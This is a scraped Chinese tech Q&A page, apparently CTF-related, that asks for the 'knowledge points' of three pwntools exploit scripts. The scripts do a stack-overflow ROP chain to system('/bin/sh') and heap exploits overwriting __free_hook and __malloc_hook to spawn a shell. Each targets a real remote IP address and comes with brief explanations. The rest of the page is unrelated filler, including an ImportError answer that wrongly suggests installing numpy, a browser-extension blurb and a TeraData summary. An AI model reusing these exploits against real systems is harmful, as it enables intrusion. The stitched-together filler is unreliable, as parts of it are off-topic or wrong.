from pwn import * import struct import os context(os='linux', arch='amd64', log_level='debug') elf = ELF("./Login") libc = ELF("./libc-2.23.so") DEBUG = 0 def exp(p): p.recvuntil("Here is a tip: 0x") std_addr = int(p.recv(12), 16) info("std_addr----->"+hex(std_addr)) libc.address = std_addr - 0x3c48e0 p.recvuntil("input the username:\n") p.send(b"a"*28+b"\xCC\x15\xCC\x15") p.recvuntil("input the password:\n") payload = b"a"*0x28 + p64(0x00000000004008c3) + p64(libc.search(b"/bin/sh").__next__()) + p64(libc.sym["system"]) p.send(payload) p.interactive() def main(): if DEBUG: p = process("./Login") gdb.attach(p, "source ./.gdbinit") exp(p) else: p = remote("59.110.164.72", 10000) exp(p) if __name__ == "__main__": main()这串代码的知识点

时间: 2024-04-28 09:24:03 浏览: 176
这是一段使用 pwntools 库编写的 exploit 脚本,用于攻击一个名为 Login 的程序。该脚本的主要作用是通过溢出 Login 程序的缓冲区来实现攻击,并最终获取一个 shell。 具体来说,该脚本的主要知识点包括: 1. 使用 pwntools 库中的各种函数来与目标程序进行交互,如 `recvuntil`、`send`、`interactive` 等。 2. 使用 `ELF` 类来解析目标程序的 ELF 文件,获取其中的地址信息等。 3. 使用 `libc` ELF 文件中的符号来获取函数地址,如 `search`、`sym` 等。 4. 使用 `gdb` 调试工具来调试目标程序,如 `process`、`attach` 等。 5. 利用栈溢出漏洞来覆盖程序的返回地址,从而实现控制程序流程的目的。 6. 利用泄漏的地址信息计算出 libc 的基地址,从而获取 libc 中的函数地址。 7. 利用 `system` 函数来执行 shell 命令,从而获取 shell。
相关问题

from pwn import *#p = process('./uheap') p = remote('59.110.164.72',10029) context(arch='amd64', log_level='debug')libc = ELF('./libc-2.27.so') elf = ELF('./uheap')menu = b"choice:" def add(idx, size):p.sendlineafter(menu, b'1')p.sendlineafter(b"Index:", str(idx).encode())p.sendlineafter(b"len:", str(size).encode())def free(idx):p.sendlineafter(menu, b'2')p.sendlineafter(b"Index:", str(idx).encode())def edit(idx,msg):p.sendlineafter(menu, b'3')p.sendlineafter(b"Index:", str(idx).encode())p.send(msg)def show(idx):p.sendlineafter(menu, b'4')p.sendlineafter(b"Index:", str(idx).encode())p.sendafter(b"Input your favorite sentence:", b'A'*0x30) p.sendlineafter(b"Input your cookie:", str(0x15C6156C).encode())p.recvuntil(b"gift: ") gift1 = int(p.recvline(),16)p.recvuntil(b"gift: ") gift2 = int(p.recvline(),16) elf.address = (gift1^gift2) - 0x202090 print(f"{gift2 = :x},{elf.address = :x}")#gdb.attach(p,'b*0x0000555555400e37\nc')add(2, 0x80) show(-11) libc.address = u64(p.recv(32)[-8:]) - libc.sym['_IO_2_1_stdout_'] print(f"{libc.address = :x}")free(2) edit(2, p64(libc.sym['__free_hook'])) add(1, 0x80)#chk edit(-11, flat(elf.address+0x202090)) edit(-11, p64((libc.sym['__free_hook']&0xFFFFFFFFFFFFF000 )+0x250))#gdb.attach(p) #pause()add(3, 0x80) edit(1, b'/bin/sh\x00') edit(3, p64(libc.sym['system']))free(1) p.interactive()这串代码的知识点

这段代码是一个堆漏洞利用的示例,主要包括以下知识点: 1. 使用pwntools库进行远程攻击,以及进行基本的交互和发送数据的操作。 2. 使用ELF类获取二进制文件中的符号信息,包括libc中的符号和elf中的符号。 3. 构造堆块,包括分配、释放、修改和查看。 4. 利用堆漏洞实现任意地址读写,以及泄露libc基址和elf基址。 5. 利用libc和elf中的符号,进行攻击。 6. 利用gdb进行调试,以及使用pause()函数进行手动调试。 总体而言,这段代码涉及的知识点比较多,需要对堆漏洞的利用以及libc和elf中的符号有一定的了解。

from pwn import * ImportError: No module named pwn

当出现`ImportError: No module named ***`的错误时,通常是因为Python无法找到所需的模块。这可能是由于以下原因之一导致的: 1. 模块未安装:确保你已经使用pip或其他包管理器正确安装了所需的模块。如果你没有安装该模块,可以使用以下命令安装numpy模块: ```shell pip install numpy ``` 2. 模块路径错误:如果模块已经安装,但Python仍然无法找到它,可能是因为模块的路径未正确设置。你可以尝试将模块路径添加到PYTHONPATH环境变量中。在Linux或Mac系统中,可以使用以下命令将模块路径添加到PYTHONPATH中: ```shell export PYTHONPATH=/usr/local/lib/python2.7/site-packages ``` 请注意,上述命令中的路径`/usr/local/lib/python2.7/site-packages`是一个示例路径,你需要将其替换为你实际安装模块的路径。
阅读全文

相关推荐

import os from pwn import * context(log_level='debug',os='linux',arch='amd64') # p = process('./1') p = remote("59.110.164.72",10027) #p = process(['/home/lin/tools/glibc-all-in-one-master/libs/2.23-0ubuntu11.3_amd64/ld-2.23.so','./1'], env = {'LD_PRELOAD' : './libc-2.23.so'}) elf=ELF('./1') libc=ELF('./libc-2.23.so') def menu(choice):     p.sendlineafter(b"Your choice :",str(choice)) menu(1) def create(size,com):     menu(1)     # menu(1)     p.sendlineafter(b"Damage of skill : ",str(size))     p.sendlineafter(b"introduction of skill:",com) def edit_1(idx,size):     menu(2)     p.sendlineafter(b"Index :",str(idx))     p.sendlineafter(b"Damage of skill : ",str(size)) def edit_intro(idx,com):     menu(3)     p.sendlineafter(b"Index :",str(idx))     p.sendlineafter(b"introduction of skill : ",com) def show(idx):     menu(4)     p.sendlineafter(b"Index :",str(idx)) def delete(idx):     menu(5)     p.sendlineafter(b"Index :",str(idx)) create(0x38,b'a'*0x38) create(0x68,b'a'*0x68) create(0x68,b'a'*0x68) create(0x68,b'a'*0x68) # gdb.attach(p) delete(3) edit_intro(0,b"b"*0x38+b"\xb1") delete(1) create(0x40,b"") show(1) p.recvuntil("Introduction : ") libc_base = u64(p.recvuntil(b"\x7f").ljust(8,b"\x00"))-0x3c4c0a print (hex(libc_base)) malloc_hook = libc_base + libc.symbols['__malloc_hook']-0x23 print (hex(malloc_hook)) one = [0x45226,0x4527a,0xf03a4,0xf1247] one_gadget = libc_base + one[3] print (hex(one_gadget)) edit_intro(1,p64(0)*3+p64(0x71)+p64(malloc_hook)) delete(0) delete(1) create(0x68,b"d"*8) # gdb.attach(p,"b *0x400cda") # pause() create(0x68,b"a"*19+p64(one_gadget)) menu(6) menu(2) ## get_shell p.interactive()

最新推荐

recommend-type

kali安装ROPgadget报错.docx

在Kali Linux中,`ROPgadget`是一个非常重要的pwn工具,用于在二进制文件中搜索适合的返回导向编程(Return-Oriented Programming, ROP) gadgets。当你尝试安装并运行`ROPgadget`时,遇到的错误是由于安装过程中的...
recommend-type

google_pwn2own

【Pwn2own大赛简介】 Pwn2own(发音为“pawn to own”)是一个年度网络安全竞赛,由Trend Micro的Zero Day Initiative(ZDI)主办。该比赛旨在揭示并解决浏览器和其他常用软件中的安全漏洞。参赛者通常会尝试利用...
recommend-type

STM32之光敏电阻模拟路灯自动开关灯代码固件

这是一个STM32模拟天黑天亮自动开关灯代码固件,使用了0.96寸OLED屏幕显示文字,例程亲测可用,视频示例可B站搜索 285902929
recommend-type

简化填写流程:Annoying Form Completer插件

资源摘要信息:"Annoying Form Completer-crx插件" Annoying Form Completer是一个针对Google Chrome浏览器的扩展程序,其主要功能是帮助用户自动填充表单中的强制性字段。对于经常需要在线填写各种表单的用户来说,这是一个非常实用的工具,因为它可以节省大量时间,并减少因重复输入相同信息而产生的烦恼。 该扩展程序的描述中提到了用户在填写表格时遇到的麻烦——必须手动输入那些恼人的强制性字段。这些字段可能包括但不限于用户名、邮箱地址、电话号码等个人信息,以及各种密码、确认密码等重复性字段。Annoying Form Completer的出现,使这一问题得到了缓解。通过该扩展,用户可以在表格填充时减少到“一个压力……或两个”,意味着极大的方便和效率提升。 值得注意的是,描述中也使用了“抽浏览器”的表述,这可能意味着该扩展具备某种数据提取或自动化填充的机制,虽然这个表述不是一个标准的技术术语,它可能暗示该扩展程序能够从用户之前的行为或者保存的信息中提取必要数据并自动填充到表单中。 虽然该扩展程序具有很大的便利性,但用户在使用时仍需谨慎,因为自动填充个人信息涉及到隐私和安全问题。理想情况下,用户应该只在信任的网站上使用这种类型的扩展程序,并确保扩展程序是从可靠的来源获取,以避免潜在的安全风险。 根据【压缩包子文件的文件名称列表】中的信息,该扩展的文件名为“Annoying_Form_Completer.crx”。CRX是Google Chrome扩展的文件格式,它是一种压缩的包格式,包含了扩展的所有必要文件和元数据。用户可以通过在Chrome浏览器中访问chrome://extensions/页面,开启“开发者模式”,然后点击“加载已解压的扩展程序”按钮来安装CRX文件。 在标签部分,我们看到“扩展程序”这一关键词,它明确了该资源的性质——这是一个浏览器扩展。扩展程序通常是通过增加浏览器的功能或提供额外的服务来增强用户体验的小型软件包。这些程序可以极大地简化用户的网上活动,从保存密码、拦截广告到自定义网页界面等。 总结来看,Annoying Form Completer作为一个Google Chrome的扩展程序,提供了一个高效的解决方案,帮助用户自动化处理在线表单的填写过程,从而提高效率并减少填写表单时的麻烦。在享受便捷的同时,用户也应确保使用扩展程序时的安全性和隐私性。
recommend-type

管理建模和仿真的文件

管理Boualem Benatallah引用此版本:布阿利姆·贝纳塔拉。管理建模和仿真。约瑟夫-傅立叶大学-格勒诺布尔第一大学,1996年。法语。NNT:电话:00345357HAL ID:电话:00345357https://theses.hal.science/tel-003453572008年12月9日提交HAL是一个多学科的开放存取档案馆,用于存放和传播科学研究论文,无论它们是否被公开。论文可以来自法国或国外的教学和研究机构,也可以来自公共或私人研究中心。L’archive ouverte pluridisciplinaire
recommend-type

CC-LINK远程IO模块AJ65SBTB1现场应用指南:常见问题快速解决

# 摘要 CC-LINK远程IO模块作为一种工业通信技术,为自动化和控制系统提供了高效的数据交换和设备管理能力。本文首先概述了CC-LINK远程IO模块的基础知识,接着详细介绍了其安装与配置流程,包括硬件的物理连接和系统集成要求,以及软件的参数设置与优化。为应对潜在的故障问题,本文还提供了故障诊断与排除的方法,并探讨了故障解决的实践案例。在高级应用方面,文中讲述了如何进行编程与控制,以及如何实现系统扩展与集成。最后,本文强调了CC-LINK远程IO模块的维护与管理的重要性,并对未来技术发展趋势进行了展望。 # 关键字 CC-LINK远程IO模块;系统集成;故障诊断;性能优化;编程与控制;维护
recommend-type

使用MATLAB写一个在柱坐标系中实现以下功能的代码:1) 生成具有损耗的平面电磁波模型;2) 调整电场分量Ex和Ey的幅度和相位,以仿真三种极化的形成?

在MATLAB中,处理电磁学问题通常需要利用`physconst`、`polar2cartesian`等函数库。以下是一个简化的示例,展示了如何生成一个基本的平面电磁波模型,并调整电场分量的幅度和相位。请注意,实际的损耗模型通常会涉及到复杂的阻抗和吸收系数,这里我们将简化为理想情况。 ```matlab % 初始化必要的物理常数 c = physconst('LightSpeed'); % 光速 omega = 2*pi * 5e9; % 角频率 (例如 GHz) eps0 = physconst('PermittivityOfFreeSpace'); % 真空介电常数 % 定义网格参数
recommend-type

TeraData技术解析与应用

资源摘要信息: "TeraData是一个高性能、高可扩展性的数据仓库和数据库管理系统,它支持大规模的数据存储和复杂的数据分析处理。TeraData的产品线主要面向大型企业级市场,提供多种数据仓库解决方案,包括并行数据仓库和云数据仓库等。由于其强大的分析能力和出色的处理速度,TeraData被广泛应用于银行、电信、制造、零售和其他需要处理大量数据的行业。TeraData系统通常采用MPP(大规模并行处理)架构,这意味着它可以通过并行处理多个计算任务来显著提高性能和吞吐量。" 由于提供的信息中描述部分也是"TeraData",且没有详细的内容,所以无法进一步提供关于该描述的详细知识点。而标签和压缩包子文件的文件名称列表也没有提供更多的信息。 在讨论TeraData时,我们可以深入了解以下几个关键知识点: 1. **MPP架构**:TeraData使用大规模并行处理(MPP)架构,这种架构允许系统通过大量并行运行的处理器来分散任务,从而实现高速数据处理。在MPP系统中,数据通常分布在多个节点上,每个节点负责一部分数据的处理工作,这样能够有效减少数据传输的时间,提高整体的处理效率。 2. **并行数据仓库**:TeraData提供并行数据仓库解决方案,这是针对大数据环境优化设计的数据库架构。它允许同时对数据进行读取和写入操作,同时能够支持对大量数据进行高效查询和复杂分析。 3. **数据仓库与BI**:TeraData系统经常与商业智能(BI)工具结合使用。数据仓库可以收集和整理来自不同业务系统的数据,BI工具则能够帮助用户进行数据分析和决策支持。TeraData的数据仓库解决方案提供了一整套的数据分析工具,包括但不限于ETL(抽取、转换、加载)工具、数据挖掘工具和OLAP(在线分析处理)功能。 4. **云数据仓库**:除了传统的本地部署解决方案,TeraData也在云端提供了数据仓库服务。云数据仓库通常更灵活、更具可伸缩性,可根据用户的需求动态调整资源分配,同时降低了企业的运维成本。 5. **高可用性和扩展性**:TeraData系统设计之初就考虑了高可用性和可扩展性。系统可以通过增加更多的处理节点来线性提升性能,同时提供了多种数据保护措施以保证数据的安全和系统的稳定运行。 6. **优化与调优**:对于数据仓库而言,性能优化是一个重要的环节。TeraData提供了一系列的优化工具和方法,比如SQL调优、索引策略和执行计划分析等,来帮助用户优化查询性能和提高数据访问效率。 7. **行业应用案例**:在金融、电信、制造等行业中,TeraData可以处理海量的交易数据、客户信息和业务数据,它在欺诈检测、客户关系管理、供应链优化等关键业务领域发挥重要作用。 8. **集成与兼容性**:TeraData系统支持与多种不同的业务应用和工具进行集成。它也遵循行业标准,能够与其他数据源、分析工具和应用程序无缝集成,为用户提供一致的用户体验。 以上便是关于TeraData的知识点介绍。由于文件描述内容重复且过于简略,未能提供更深层次的介绍,如果需要进一步详细的知识,建议参考TeraData官方文档或相关技术文章以获取更多的专业信息。
recommend-type

"互动学习:行动中的多样性与论文攻读经历"

多样性她- 事实上SCI NCES你的时间表ECOLEDO C Tora SC和NCESPOUR l’Ingén学习互动,互动学习以行动为中心的强化学习学会互动,互动学习,以行动为中心的强化学习计算机科学博士论文于2021年9月28日在Villeneuve d'Asq公开支持马修·瑟林评审团主席法布里斯·勒菲弗尔阿维尼翁大学教授论文指导奥利维尔·皮耶昆谷歌研究教授:智囊团论文联合主任菲利普·普雷教授,大学。里尔/CRISTAL/因里亚报告员奥利维耶·西格德索邦大学报告员卢多维奇·德诺耶教授,Facebook /索邦大学审查员越南圣迈IMT Atlantic高级讲师邀请弗洛里安·斯特鲁布博士,Deepmind对于那些及时看到自己错误的人...3谢谢你首先,我要感谢我的两位博士生导师Olivier和Philippe。奥利维尔,"站在巨人的肩膀上"这句话对你来说完全有意义了。从科学上讲,你知道在这篇论文的(许多)错误中,你是我可以依
recommend-type

CC-LINK远程IO模块在环境监控中的应用:技术与案例探讨

![CC-LINK](https://www.mitsubishielectric.com/fa/products/cnt/plcnet/pmerit/cclink_ie/concept/img/main_img.jpg) # 摘要 CC-LINK远程IO模块作为一种先进的工业通信技术,在环境监控系统中具有广泛应用。本文首先概述了CC-LINK远程IO模块的基本概念及其在环境监控系统中的基础理论,包括硬件组成、软件架构及技术优势。随后,详细介绍了其在实时监控与远程控制、系统集成与配置、安全维护方面的具体实践应用。案例分析部分深入探讨了CC-LINK模块在不同环境监控场景中的应用效果与技术解决